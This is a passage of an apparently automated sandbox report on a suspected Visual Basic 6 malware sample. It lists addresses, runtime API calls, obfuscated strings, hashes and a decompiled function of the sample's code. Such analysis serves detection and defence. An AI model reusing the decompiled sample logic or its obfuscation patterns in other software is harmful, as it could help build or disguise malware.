              0x00414077
              0x0041407c
              0x0041407d
              0x00414082
              0x00414087
              0x0041408c
              0x00414091
              0x00414097
              0x0041409e
              0x004140ad
              0x004140ba
              0x004140c1
              0x004140c2
              0x004140c4
              0x004140c9
              0x004140cc
              0x004140d3
              0x004140d5
              0x004140d7
              0x004140de
              0x004140e5
              0x004140e7
              0x004140f2
              0x004140f3
              0x004140fa
              0x004140fb
              0x00414108
              0x00414109
              0x0041410a
              0x0041410b
              0x0041410c
              0x0041410e
              0x00414114
              0x0041411f
              0x0041411f
              0x00414124
              0x0041412b
              0x00414130
              0x00414135
              0x0041413a
              0x0041413f
              0x00414144
              0x0041414a
              0x0041414f
              0x00414159
              0x0041415b
              0x00414162
              0x00414169
              0x00414173
              0x00414189
              0x0041418e
              0x00414190
              0x00414196
              0x00414197
              0x0041419c
              0x004141a8
              0x004141a8
              0x004141ad
              0x004141b4
              0x004141b9
              0x004141be
              0x004141c3
              0x004141c9
              0x004141ce
              0x004141d8
              0x004141de
              0x004141e5
              0x004141ef
              0x004141f9
              0x00414203
              0x0041420d
              0x00414217
              0x00414221
              0x0041422b
              0x00414241
              0x0041424c
              0x00414253
              0x0041425a
              0x0041425b
              0x00414263
              0x00414264
              0x0041426f
              0x00414276
              0x0041427d
              0x0041427e
              0x00414284
              0x00414285
              0x00414287
              0x0041428c
              0x0041428c
              0x0041428f
              0x004142a1
              0x004142a6
              0x004142ad
              0x004142ae
              0x004142b3
              0x004142b8
              0x004142be
              0x004142bf
              0x004142c4
              0x004142ca
              0x004142d1
              0x004142e0
              0x004142ed
              0x004142f4
              0x004142f5
              0x004142f7
              0x004142ff
              0x00414306
              0x00414308
              0x0041430a
              0x00414311
              0x00414316
              0x00414316
              0x0041431b
              0x00414322
              0x00414327
              0x0041432c
              0x00414331
              0x00414337
              0x0041433c
              0x00414346
              0x00414348
              0x0041434f
              0x00414359
              0x0041436f
              0x0041437a
              0x0041437b
              0x00414386
              0x00414386
              0x0041438b
              0x00414392
              0x00414397
              0x0041439d
              0x0041439e
              0x004143a3
              0x004143a4
              0x004143a9
              0x004143ae
              0x004143b4
              0x004143bb
              0x004143ca
              0x004143d7
              0x004143dc
              0x004143e3
              0x004143e5
              0x004143e7
              0x004143ee
              0x004143f5
              0x004143ff
              0x00414415
              0x0041441a
              0x0041441c
              0x00414422
              0x00414423
              0x00414428
              0x00414434
              0x00414434
              0x00414439
              0x00414440
              0x00414445
              0x0041444a
              0x0041444f
              0x00414454
              0x0041445a
              0x0041445f
              0x00414469
              0x0041446f
              0x00414476
              0x0041447d
              0x0041449a
              0x0041447f
              0x0041447f
              0x00414484
              0x00414489
              0x0041448e
              0x0041448e
              0x004144ac
              0x004144b5
              0x004144bc
              0x004144d0
              0x004144d3
              0x004144d5
              0x004144db
              0x004144e2
              0x00414504
              0x00414504
              0x00414504
              0x004144e4
              0x004144e4
              0x004144e6
              0x004144eb
              0x004144f1
              0x004144f7
              0x004144fc
              0x004144fc
              0x00414511
              0x00414511
              0x00414516
              0x0041451d
              0x00414522
              0x00414527
              0x0041452c
              0x00414531
              0x00414537
              0x0041453c
              0x00414546
              0x0041454c
              0x00414562
              0x00414568
              0x0041456a
              0x00414570
              0x00414577
              0x00414599
              0x00414599
              0x00414599
              0x00414579
              0x00414579
              0x0041457e
              0x00414583
              0x00414586
              0x0041458c
              0x00414591
              0x00414591
              0x004145a0
              0x004145a7
              0x004145c4
              0x004145a9
              0x004145a9
              0x004145ae
              0x004145b3
              0x004145b8
              0x004145b8
              0x004145d6
              0x004145e2
              0x004145e8
              0x004145fa
              0x00414601
              0x00414615
              0x00414618
              0x0041461a
              0x00414620
              0x00414627
              0x00414649
              0x00414649
              0x00414649
              0x00414629
              0x00414629
              0x0041462b
              0x00414630
              0x00414636
              0x0041463c
              0x00414641
              0x00414641
              0x00414656
              0x00414656
              0x0041465b
              0x00414662
              0x00414667
              0x0041466c
              0x00414672
              0x00414677
              0x00414681
              0x00414687
              0x0041468e
              0x00414695
              0x0041469f
              0x004146a9
              0x004146b3
              0x004146bd
              0x004146c7
              0x004146d1
              0x004146db
              0x004146e5
              0x004146ef
              0x004146f9
              0x00414703
              0x0041470d
              0x00414717
              0x0041472d
              0x00414738
              0x0041473f
              0x00414746
              0x0041474d
              0x00414754
              0x0041475b
              0x00414762
              0x00414763
              0x00414770
              0x0041477b
              0x00414782
              0x00414789
              0x00414790
              0x00414797
              0x0041479e
              0x004147a5
              0x004147a6
              0x004147a8
              0x004147ad
              0x004147b0
              0x004147b7
              0x004147bc
              0x004147c2
              0x004147c3
              0x004147c8
              0x004147c9
              0x004147ce
              0x004147d4
              0x004147db
              0x004147ea
              0x004147f7
              0x004147fc
              0x00414803
              0x00414805
              0x00414807
              0x0041480e
              0x00414815
              0x00414817
              0x0041481c
              0x0041481c
              0x00414822
              0x00414829
              0x0041482b
              0x00414830
              0x00414835
              0x0041483b
              0x0041483d
              0x0041483e
              0x00414840
              0x00414847
              0x00414847
              0x0041484c
              0x00414853
              0x00414854
              0x004148d1
              0x004148d9
              0x004148e1
              0x004148e9
              0x004148f4
              0x004148ff
              0x0041490a
              0x00414915
              0x0041491a

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00412892
              • #680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00412940
              • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00412962
              • #664.MSVBVM60(?,00000002,00000002,00000002,00000002), ref: 004129E1
              • __vbaStrVarVal.MSVBVM60(?,?,?,00000002,00000002,00000002,00000002), ref: 004129F4
              • #581.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 004129FA
              • __vbaFpR8.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 004129FF
              • __vbaFreeStr.MSVBVM60 ref: 00412A37
              • __vbaFreeVarList.MSVBVM60(00000005,00000002,00000002,00000002,00000002,?), ref: 00412A61
              • #716.MSVBVM60(?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412A90
              • __vbaChkstk.MSVBVM60(?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412A98
              • __vbaLateIdSt.MSVBVM60(?,00000000,?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412AAE
              • __vbaFreeVar.MSVBVM60(?,00000000,?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412AB9
              • #516.MSVBVM60(00411918,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412ACA
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041046C,00000254), ref: 00412B10
              • #676.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00412B76
              • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00412B7B
              • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 00412BBD
              • __vbaChkstk.MSVBVM60 ref: 00412C20
              • __vbaChkstk.MSVBVM60 ref: 00412C34
              • __vbaChkstk.MSVBVM60 ref: 00412C48
              • __vbaLateMemCall.MSVBVM60(?,NzXRmXMzPSdU58,00000003), ref: 00412C66
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,00000718), ref: 00412CAC
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,00000708), ref: 00412D72
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,00000708), ref: 00412DF8
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,000006F8), ref: 00412E5B
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,000006FC), ref: 00412F4C
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,00000718), ref: 00412FAC
              • __vbaStrCopy.MSVBVM60(00000000,?,0041049C,00000718), ref: 00412FDE
              • __vbaFreeStr.MSVBVM60 ref: 0041301E
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,000006F8), ref: 004130D2
              • __vbaStrCopy.MSVBVM60(00000000,?,0041049C,000006F8), ref: 004130F8
              • __vbaFreeStr.MSVBVM60 ref: 00413132
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,000006F8), ref: 004131B1
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,0000070C,?,?,8904D3F8,000000F1,0CDBA990,00005B00,?,8904D3F8,?), ref: 0041327A
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,00000700,?,?,8904D3F8,000000F1,0CDBA990,00005B00,?,8904D3F8,?), ref: 004132C5
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,0000070C,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059,?,00000086), ref: 0041344B
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,000006F8,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059,?,00000086), ref: 00413496
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,0000070C,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05), ref: 0041355B
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,000006FC,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 00413674
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,000006F8,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 004136CD
              • __vbaStrCopy.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 004136F3
              • __vbaFreeStr.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 00413730
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,00000710,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413809
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,00000708,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413895
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,00000714,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 0041396C
              • __vbaOnError.MSVBVM60(000000FF,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79), ref: 00413995
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041046C,000001B8,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 004139DA
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041046C,000001BC,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413A2D
              • __vbaVarMove.MSVBVM60(?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 00413A69
              • __vbaVarAdd.MSVBVM60(?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413A9B
              • __vbaVarMove.MSVBVM60(?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413AA5
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,00000704,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413B35
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,000006F8,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413B9E
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,000006FC,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413C92
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041049C,00000718,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413CF2
              • __vbaStrCopy.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413D24
              • __vbaFreeStr.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413D64
              • __vbaVarTstLt.MSVBVM60(00008003,?,?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#), ref: 00413D8F
              • __vbaVarMove.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413DC4
              • __vbaStrToAnsi.MSVBVM60(?,bangsternears,98E72E79,?,?,?,00000002,?,?,0000037B,?,0000037B), ref: 00413DFF
              • __vbaStrToAnsi.MSVBVM60(?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79,?,?,?,00000002,?), ref: 00413E2B
              • __vbaStrToAnsi.MSVBVM60(?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79,?,?,?), ref: 00413E3D
              • __vbaSetSystemError.MSVBVM60(00000000,?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79), ref: 00413E4E
              • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?), ref: 00413E82
              • __vbaNew2.MSVBVM60(004119C8,004183D8,?,?,?,?,?,?,00411918), ref: 00413EBA
              • __vbaLateMemCallLd.MSVBVM60(?,?,M9uACtmJ7nAtSvje8kbN9w249,00000000), ref: 00413EF7
              • __vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,00411918), ref: 00413F00
              • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00411918), ref: 00413F0D
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,0000000C), ref: 00413F48
              • __vbaFreeObj.MSVBVM60(00000000,?,004119B8,0000000C), ref: 00413F62
              • __vbaFreeVar.MSVBVM60(00000000,?,004119B8,0000000C), ref: 00413F6D
              • __vbaStrToAnsi.MSVBVM60(?,bangsternears, 'y), ref: 00413F96
              • __vbaSetSystemError.MSVBVM60(00000000,?,bangsternears, 'y), ref: 00413FA8
              • __vbaFreeStr.MSVBVM60(00000000,?,bangsternears, 'y), ref: 00413FCD
              • __vbaChkstk.MSVBVM60(00000000,?,bangsternears, 'y), ref: 00414016
              • __vbaChkstk.MSVBVM60(00000000,?,bangsternears, 'y), ref: 0041402A
              • __vbaLateMemCall.MSVBVM60(?,EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25,00000002,00000000,?,bangsternears, 'y), ref: 00414045
              • __vbaStrToAnsi.MSVBVM60(?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 00414065
              • __vbaStrToAnsi.MSVBVM60(?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 00414077
              • __vbaSetSystemError.MSVBVM60(8904D3F8,003DB7DB,00753ECA,00000000,?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 00414097
              • __vbaFreeStrList.MSVBVM60(00000002,?,?,8904D3F8,003DB7DB,00753ECA,00000000,?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears), ref: 004140C4
              • #716.MSVBVM60(?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411918), ref: 004140F3
              • __vbaChkstk.MSVBVM60(?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411918), ref: 004140FB
              • __vbaLateIdSt.MSVBVM60(?,00000000,?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411918), ref: 00414114
              • __vbaFreeVar.MSVBVM60(?,00000000,?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411918), ref: 0041411F
              • __vbaSetSystemError.MSVBVM60(98E72E79,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411918), ref: 0041414A
              • __vbaVarDup.MSVBVM60 ref: 00414189
              • #600.MSVBVM60(?,00000002), ref: 00414197
              • __vbaFreeVar.MSVBVM60(?,00000002), ref: 004141A8
              • __vbaSetSystemError.MSVBVM60(0058E1C9,00350DDE), ref: 004141C9
              • __vbaVarDup.MSVBVM60(0058E1C9,00350DDE), ref: 00414241
              • #595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A,0058E1C9,00350DDE), ref: 00414264
              • __vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A,0058E1C9,00350DDE), ref: 00414287
              • __vbaStrCopy.MSVBVM60(0058E1C9,00350DDE), ref: 004142A1
              • __vbaStrToAnsi.MSVBVM60(?,00000000,0058E1C9,00350DDE), ref: 004142AE
              • __vbaSetSystemError.MSVBVM60(?,8904D3F8,?,00000000,0058E1C9,00350DDE), ref: 004142CA
              • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,8904D3F8,?,00000000,0058E1C9,00350DDE), ref: 004142F7
              • #532.MSVBVM60(LAANELOFTERNE,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411918), ref: 00414316
              • __vbaSetSystemError.MSVBVM60(000D2930,8904D3F8,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411918), ref: 00414337
              • __vbaVarDup.MSVBVM60 ref: 0041436F
              • #529.MSVBVM60(?), ref: 0041437B
              • __vbaFreeVar.MSVBVM60(?), ref: 00414386
              • __vbaStrToAnsi.MSVBVM60(?,Gooiest4), ref: 0041439E
              • __vbaSetSystemError.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 004143B4
              • __vbaFreeStr.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 004143D7
              • __vbaVarDup.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 00414415
              • #600.MSVBVM60(?,00000002,98E72E79,00000000,?,Gooiest4), ref: 00414423
              • __vbaFreeVar.MSVBVM60(?,00000002,98E72E79,00000000,?,Gooiest4), ref: 00414434
              • __vbaSetSystemError.MSVBVM60(0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041445A
              • __vbaNew2.MSVBVM60(004119C8,004183D8,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414489
              • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004144BC
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000010), ref: 004144F7
              • __vbaFreeObj.MSVBVM60(00000000,?,004119B8,00000010), ref: 00414511
              • __vbaSetSystemError.MSVBVM60(8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414537
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041046C,00000160), ref: 0041458C
              • __vbaNew2.MSVBVM60(004119C8,004183D8), ref: 004145B3
              • __vbaObjSet.MSVBVM60(?,?,incomprehensible), ref: 00414601
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000040), ref: 0041463C
              • __vbaFreeObj.MSVBVM60(00000000,?,004119B8,00000040), ref: 00414656
              • __vbaSetSystemError.MSVBVM60(8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414672
              • __vbaVarDup.MSVBVM60(8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041472D
              • #596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000), ref: 00414763
              • __vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000), ref: 00414770
              • __vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8), ref: 004147A8
              • __vbaStrToAnsi.MSVBVM60(?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 004147C3
              • __vbaSetSystemError.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 004147D4
              • __vbaFreeStr.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 004147F7
              • #570.MSVBVM60(0000001C,00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414817
              • _CIcos.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041482B
              • __vbaFpR8.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414830
              • __vbaEnd.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414847
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$CheckHresult$Free$Error$System$Ansi$ChkstkList$CopyLate$Move$CallNew2$#600#716Addref$#516#529#532#570#581#595#596#664#676#680Icos
              • String ID: Ausones$Charcuterieganocephalantu$EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25$Filmselskabets$Gastriloquy$Gooiest4$LAANELOFTERNE$M9uACtmJ7nAtSvje8kbN9w249$NzXRmXMzPSdU58$Porto7$Statscheferstronhi8$Subskriptionen8$bangsternears$c$d$encryptions$incomprehensible$rebslagerierneshand$s[$samtaleemnetsrhes$solicit$sykofanter$t$)#
              • API String ID: 759312655-2082158243
              • Opcode ID: 55b2d69b35e7376005ddb78a1b9adf3e5aede54433b593d9fc27a122c4e9429f
              • Instruction ID: 8f6b855389c8f822d85e30eb9e07f0e598c36e1e2d3bc97c92b120205e27650e
              • Opcode Fuzzy Hash: 55b2d69b35e7376005ddb78a1b9adf3e5aede54433b593d9fc27a122c4e9429f
              • Instruction Fuzzy Hash: 4513D3B1901619EFDB20EF50CD89BDDBBB4EF08305F0041EAE509AA2A1D7795B84DF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004170F9, Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 186COMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 56%
              			E004170F9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v24;
				char _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				char _v56;
				char* _v64;
				char _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				signed int _v96;
				signed long long _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _t74;
				signed int _t78;
				char* _t79;
				signed int _t85;
				signed int _t91;
				char* _t101;
				intOrPtr* _t118;
				signed long long _t129;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				_push(0x60);
				L004016F0();
				_v12 = _t118;
				_v8 = 0x4016d0;
				_v64 = 0x411df0;
				_v72 = 8;
				L004018A0();
				_t74 =  &_v56;
				_push(_t74); // executed
				L00401816(); // executed
				L00401882();
				_push(_t74);
				_push(0);
				L0040184C();
				asm("sbb eax, eax");
				_v76 =  ~( ~_t74 + 1);
				L00401924();
				_t101 =  &_v56;
				L00401912();
				_t78 = _v76;
				if(_t78 != 0) {
					_push(_t101);
					 *_t118 =  *0x4016c8;
					_t129 =  *0x4016c0 *  *0x401618;
					if( *0x418000 != 0) {
						_push( *0x401614);
						_push( *0x401610);
						L00401714();
					} else {
						_t129 = _t129 /  *0x401610;
					}
					_v100 = _t129;
					 *_t118 = _v100;
					_v64 =  *0x4016b8;
					L0040183A();
					_v72 =  *0x4016a8;
					_v76 =  *0x4014c8;
					_v80 =  *0x4014c8;
					_t78 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t101, _t101, _t101, _t78, _t101, _t101);
					asm("fclex");
					_v76 = _t78;
					if(_v76 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x41046c);
						_push(_a4);
						_push(_v76);
						L00401906();
						_v104 = _t78;
					}
				}
				_push(0x411dfc);
				_push(0x411dfc);
				L0040184C();
				if(_t78 != 0) {
					if( *0x4183d8 != 0) {
						_v108 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v108 = 0x4183d8;
					}
					_v76 =  *_v108;
					_t85 =  *((intOrPtr*)( *_v76 + 0x4c))(_v76,  &_v36);
					asm("fclex");
					_v80 = _t85;
					if(_v80 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x4119b8);
						_push(_v76);
						_push(_v80);
						L00401906();
						_v112 = _t85;
					}
					_v84 = _v36;
					_v64 = 0x75;
					_v72 = 2;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t91 =  *((intOrPtr*)( *_v84 + 0x1c))(_v84, 0x10,  &_v40);
					asm("fclex");
					_v88 = _t91;
					if(_v88 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x411c68);
						_push(_v84);
						_push(_v88);
						L00401906();
						_v116 = _t91;
					}
					_v96 = _v40;
					_v40 = _v40 & 0x00000000;
					_push(_v96);
					_push( &_v28);
					L00401888();
					L004018AC();
				}
				_v64 = L"Colmars8";
				_v72 = 8;
				L004018A0();
				_push(0);
				_t79 =  &_v56;
				_push(_t79); // executed
				L0040178C(); // executed
				L00401882();
				L00401912();
				asm("wait");
				_push(0x417399);
				L00401924();
				L004018AC();
				return _t79;
			}































              0x004170fe
              0x00417109
              0x0041710a
              0x00417111
              0x00417114
              0x0041711c
              0x0041711f
              0x00417126
              0x0041712d
              0x0041713a
              0x0041713f
              0x00417142
              0x00417143
              0x0041714d
              0x00417152
              0x00417153
              0x00417155
              0x0041715c
              0x00417161
              0x00417168
              0x0041716d
              0x00417170
              0x00417175
              0x0041717b
              0x00417187
              0x00417188
              0x00417191
              0x0041719e
              0x004171a8
              0x004171ae
              0x004171b4
              0x004171a0
              0x004171a0
              0x004171a0
              0x004171b9
              0x004171c0
              0x004171ca
              0x004171d3
              0x004171e0
              0x004171ea
              0x004171f4
              0x00417204
              0x0041720a
              0x0041720c
              0x00417213
              0x0041722f
              0x00417215
              0x00417215
              0x0041721a
              0x0041721f
              0x00417222
              0x00417225
              0x0041722a
              0x0041722a
              0x00417213
              0x00417233
              0x00417238
              0x0041723d
              0x00417244
              0x00417251
              0x0041726b
              0x00417253
              0x00417253
              0x00417258
              0x0041725d
              0x00417262
              0x00417262
              0x00417277
              0x00417286
              0x00417289
              0x0041728b
              0x00417292
              0x004172ab
              0x00417294
              0x00417294
              0x00417296
              0x0041729b
              0x0041729e
              0x004172a1
              0x004172a6
              0x004172a6
              0x004172b2
              0x004172b5
              0x004172bc
              0x004172ca
              0x004172d4
              0x004172d5
              0x004172d6
              0x004172d7
              0x004172e0
              0x004172e3
              0x004172e5
              0x004172ec
              0x00417305
              0x004172ee
              0x004172ee
              0x004172f0
              0x004172f5
              0x004172f8
              0x004172fb
              0x00417300
              0x00417300
              0x0041730c
              0x0041730f
              0x00417313
              0x00417319
              0x0041731a
              0x00417322
              0x00417322
              0x00417327
              0x0041732e
              0x0041733b
              0x00417340
              0x00417342
              0x00417345
              0x00417346
              0x00417350
              0x00417358
              0x0041735d
              0x0041735e
              0x0041738b
              0x00417393
              0x00417398

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00417114
              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041713A
              • #667.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00417143
              • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041714D
              • __vbaStrCmp.MSVBVM60(00000000,00000000,?), ref: 00417155
              • __vbaFreeStr.MSVBVM60(00000000,00000000,?), ref: 00417168
              • __vbaFreeVar.MSVBVM60(00000000,00000000,?), ref: 00417170
